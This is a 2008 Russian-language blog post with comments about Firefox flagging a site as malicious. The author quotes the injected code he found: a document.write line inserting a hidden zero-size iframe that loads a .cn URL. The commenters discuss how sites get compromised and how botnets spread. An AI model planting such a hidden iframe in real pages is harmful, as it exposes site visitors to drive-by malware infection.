dil: (Default)
dil ([personal profile] dil) wrote2008-04-28 02:50 pm
  • Add Memory
  • Share This Entry
Entry tags:

Спасибо товарищу Сталину за наше счастливое детство



не, спасибо за предупреждение, конечно, но если я всё-таки хочу туда попасть?

Upd: в общем-то, туда ходить действительно не стОит, потому что ничего хорошего вот это не принесёт:
document.write('<iframe src="http:// xanjan .cn/in.cgi?mytraf" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>
Что не отменяет вышенаписанного.
Flat | Top-Level Comments Only

[identity profile] tullamoredew.livejournal.com 2008-04-28 02:12 pm (UTC)(link)
а у нас работает, хотя прокся в фирме стоит очень злобная

[identity profile] dil.livejournal.com 2008-04-28 03:28 pm (UTC)(link)
это не прокся, это сам FF

[identity profile] tullamoredew.livejournal.com 2008-04-28 03:37 pm (UTC)(link)
какой нибудь плагин, или просто завышенный секьюрити?

[identity profile] dil.livejournal.com 2008-04-28 03:45 pm (UTC)(link)
дефолтовая настройка безопасности в свежем FF

[identity profile] cybernatic-cat.livejournal.com 2008-04-28 02:20 pm (UTC)(link)
Более интересно, как и зачем оно такое попало на вполне безобидный сайт...

[identity profile] dil.livejournal.com 2008-04-28 03:46 pm (UTC)(link)
ну тут много вариантов. либо дырка в сайте, либо троян на машине админа, либо дырка на сервере хостера..

[identity profile] cybernatic-cat.livejournal.com 2008-04-28 04:43 pm (UTC)(link)
Мда, варианты - один другого аппетитнее... :)

[identity profile] dixi.livejournal.com 2008-04-28 06:35 pm (UTC)(link)
ботнеты так и растят часто - заражают пачку сайтов, потом сажают трояна посетителям.

[identity profile] cybernatic-cat.livejournal.com 2008-04-28 07:48 pm (UTC)(link)
Это я понимаю. Но мне непонятно, в какую сторону смотрят авторы движка сайта и его админы. И откуда у них растут руки.

[identity profile] dixi.livejournal.com 2008-04-28 07:52 pm (UTC)(link)
ну нет пока что стандартных систем для контроля целостности серверного кода.
а распространённая практика прямого выкладывания на сайт по фтп очень удобна ботнетчикам.

[identity profile] cybernatic-cat.livejournal.com 2008-04-28 07:59 pm (UTC)(link)
Угу, лично я разработчиков нашего сайта натурально заебался пинать: "Закачал очередное файло - ЗАКРОЙ FTP-ПОРТЫ НА ФАЙРВОЛЛЕ, для того тебе и дан sudo!!"
Как о стенку горохом. Такое ощущение, что web-разработчики зачастую просто не понимают самых тривиальных вещей...

[identity profile] dixi.livejournal.com 2008-04-28 08:02 pm (UTC)(link)
ну, в случае с шаред хостингом никаких портов ни на каком файрволле ни у кого нет.

[identity profile] dil.livejournal.com 2008-04-29 06:57 am (UTC)(link)
ну дык вот, например.. http://bugtraq.ru/rsn/archive/2008/04/14.html

[identity profile] dil.livejournal.com 2008-04-29 07:04 am (UTC)(link)
http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

[identity profile] hj-koshinji.livejournal.com 2008-04-28 02:58 pm (UTC)(link)
Если FF3 beta то отключается в настройках - Безопасность\Security

[identity profile] dil.livejournal.com 2008-04-28 03:29 pm (UTC)(link)
ага, только оно отключается вместе с предупреждениями. а вот так, чтобы предупреждало, но пускало, если мне уж так приспичило - не получается

[identity profile] ex-charset386.livejournal.com 2008-04-28 05:06 pm (UTC)(link)
Для этого есть плагин View This Page in IE. :)

[identity profile] dil.livejournal.com 2008-04-28 05:21 pm (UTC)(link)
На этот случай у меня тут есть живой IE6 в wine :)
Flat | Top-Level Comments Only